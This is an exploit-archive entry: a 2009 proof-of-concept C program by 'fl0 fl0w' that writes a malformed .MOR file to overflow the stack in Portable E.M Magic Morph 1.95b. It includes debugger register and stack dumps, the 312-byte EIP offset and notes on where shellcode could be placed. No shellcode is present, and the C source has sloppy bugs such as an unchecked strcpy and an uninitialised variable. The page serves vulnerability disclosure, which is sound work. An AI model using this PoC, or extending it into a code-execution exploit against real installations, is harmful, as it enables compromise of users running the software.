Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC

2009-09-24 / 2009-09-25
Credit: fl0 fl0w
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/********************************************************************* Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC * By fl0 fl0w * "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" * ********************************************************************** /******************************************************************************************************** The EIP offset is at 312 bytes 0x138 HEX * After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start * of the file, and you'll have to rezult with 0x138 bytes * * I used a technique names "stack spray" to determine the offset. * * CPU REGISTERS * EAX 00000000 * ECX 33333333 * EDX 01492288 * EBX 00000001 * * ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa * ````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY * XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223 * EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY * YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b * bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa * * ESI 00F369B0 * EDI 00F369B0 * EIP 41414141 * * We control ECX, EIP witch is more than enought to copy what addresess you want in the memory. * So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption* starts at a much lower address. * This is what ESP points to: * ******************************************************************************************************** */ /************************ STACK * 0012EF7C 62343434 * 0012EF80 62626262 * 0012EF84 62626262 * 0012EF88 67676262 * 0012EF8C 67676767 * 0012EF90 67676767 * 0012EF94 67676767 * 0012EF98 62676767 * 0012EF9C 61616161 * 0012EFA0 61616161 * 0012EFA4 61616161 * 0012EFA8 61616161 * 0012EFAC 61616161 * 0012EFB0 61616161 * 0012EFB4 61616161 * 0012EFB8 61616161 * 0012EFBC 61616161 * 0012EFC0 61616161 * 0012EFC4 61616161 * 0012EFC8 61616161 * 0012EFCC 60606060 * 0012EFD0 60606060 * 0012EFD4 60606060 * 0012EFD8 60606060 * 0012EFDC 60606060 * 0012EFE0 60606060 * 0012EFE4 60606060 * 0012EFE8 60606060 * 0012EFF0 60606060 * 0012EFF4 60606060 * 0012EFF8 60606060 * 0012EFFC 59595959 * 0012F000 59595959 * 0012F004 59595959 * 0012F008 59595959 * 0012F00C 59595959 * ..................... * *********************** */ /************************************************* You can copy your shellcode starting from here : * 0012EC3C 63636363 * * 0x12EF80 = 1240960 ->NOT-> A * * 0x12EC3C = 1240124 ->NOT-> B * * A > B * A - B = 836 = 0x344 * So the stack gets corrupted a long way from ESP.* ************************************************* */ /************************************************* LOOK OF THE DUMP * 0012EE4C 63 63 63 63 cccc * 0012EE54 63 63 63 63 63 63 63 63 cccccccc * 0012EE5C 32 32 32 32 32 32 32 32 22222222 * 0012EE64 32 33 33 33 33 33 33 33 23333333 * 0012EE6C 33 33 33 66 66 66 66 66 333fffff * 0012EE74 41 41 41 41 77 77 34 34 AAAAww44 * 0012EE7C 34 34 34 62 62 62 62 62 444bbbbb * 0012EE84 62 62 62 62 62 62 67 67 bbbbbbgg * 0012EE8C 67 67 67 67 67 67 67 67 gggggggg * 0012EE94 67 67 67 67 67 67 67 62 gggggggb * 0012EE9C 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EEA4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EEAC 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EEB4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EEBC 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EEC4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EECC 60 60 60 60 60 60 60 60 ```````` * 0012EED4 60 60 60 60 60 60 60 60 ```````` * 0012EEDC 60 60 60 60 60 60 60 60 ```````` * 0012EEE4 60 60 60 60 60 60 60 60 ```````` * 0012EEEC 60 60 60 60 60 60 60 60 ```````` * 0012EEF4 60 60 60 60 60 60 60 60 ```````` * 0012EEFC 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF04 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF0C 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF14 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF1C 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF24 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF2C 58 58 58 58 58 58 58 58 XXXXXXXX * 0012EF34 58 58 58 58 58 58 58 58 XXXXXXXX * 0012EF3C 63 63 63 63 63 63 63 63 cccccccc * 0012EF44 63 63 63 63 63 63 63 63 cccccccc * 0012EF4C 63 63 63 63 63 63 63 63 cccccccc * 0012EF54 63 63 63 63 63 63 63 63 cccccccc * 0012EF5C 32 32 32 32 32 32 32 32 22222222 * 0012EF64 32 33 33 33 33 33 33 33 23333333 * 0012EF6C 33 33 33 66 66 66 66 66 333fffff * 0012EF74 41 41 41 41 77 77 34 34 AAAAww44 * 0012EF7C 34 34 34 62 62 62 62 62 444bbbbb * 0012EF84 62 62 62 62 62 62 67 67 bbbbbbgg * 0012EF8C 67 67 67 67 67 67 67 67 gggggggg * 0012EF94 67 67 67 67 67 67 67 62 gggggggb * 0012EF9C 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFA4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFAC 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFB4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFBC 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFC4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFCC 60 60 60 60 60 60 60 60 ```````` * 0012EFD4 60 60 60 60 60 60 60 60 ```````` * 0012EFDC 60 60 60 60 60 60 60 60 ```````` * 0012EFE4 60 60 60 60 60 60 60 60 ```````` * 0012EFEC 60 60 60 60 60 60 60 60 ```````` * 0012EFF4 60 60 60 60 60 60 60 60 ```````` * 0012EFFC 59 59 59 59 59 59 59 59 YYYYYYYY * 0012F004 59 59 59 59 59 59 59 59 YYYYYYYY * 0012F00C 59 59 59 59 59 59 59 59 YYYYYYYY * ************************************************* */ /************************************************************************************** Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org * Special greetz to OSHO,!_30,str0ke,Carcabot. * Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. * http://www.sploitz.10001mb.com * ************************************************************************************* */ /************************************************************************* DEMO * C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe * ********************************************************************* * Magic Morph .MOR File Stack Buffer Overflow POC * The usage is: * All Credits fl0 fl0w * * -f FILE.mor * ************************************************************************** * C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST * File DONE ! * ************************************************************************** */ /***************************************************************************************** Technicall details * This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3 * You can download the POC allong with debugging details from my website * Preview ... * ...... * This folder contains two screenshots from the ollydbg debbugging session, the poc(MM.CPP)* and the software Portable E.M Magic Morph 1.95b. * ALL CREDITS GO TO fl0 fl0w for this exploit ! * http://www.sploitz.10001mb.com/ * ........................... * ****************************************************************************************** */ //START Algorithm #include "stdio.h" #include "string.h" #include "stdlib.h" #include "windows.h" #include "stdint.h" #include "getopt.h" typedef struct flo { uint8_t a; uint8_t b; uint8_t c; }F; void buildFile(char *fname) { uint8_t hexfileP1[] = { 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73, 0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34, 0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62, }; uint8_t hexfileP2[] = { 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, }; uint8_t hexfileP3[] = { 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C, 0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, } ; FILE *f; f = fopen(fname ,"wb"); F *Gf; Gf = (F*)malloc(sizeof(F)); Gf->a = 0x43; Gf->b = 0x3A; Gf->c = 0x5C; uint8_t B[100]; memcpy(B, Gf, sizeof(Gf)); fwrite(B, sizeof(uint8_t), 3, f); fwrite(hexfileP1, sizeof(uint8_t), sizeof(hexfileP1), f); fwrite(hexfileP2, sizeof(uint8_t), sizeof(hexfileP2), f); fwrite(hexfileP3, sizeof(uint8_t), sizeof(hexfileP3), f); fclose(f); } void args(int argc, char *argv[]) { int file; int a; if(a) while((a = getopt(argc, argv, "f")) != EOF) { switch(a) { case 'f': file = (int)optarg; break; default: exit(-1); } } } void Usage (char *Name) { system("CLS"); printf("*********************************************************************\n"); fprintf ( stdout , "\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n"); printf("The usage is:\n"); fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n"); } void Menu() { fprintf(stderr, "\n" "\t-f FILE.mor\n" "*********************************************************************" "\n"); } int main(int32_t argc , char *argv[]) { if(argc < 2) { Usage(argv[0]); Menu(); exit(-1); } char b[100]; strcpy(b, argv[2]); strcat(b, ".mor"); buildFile(b); printf("File DONE !\n"); return 0; } //END Algorithm

References:

http://www.vupen.com/english/advisories/2009/2658
http://www.milw0rm.com/exploits/9659
http://secunia.com/advisories/36721


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top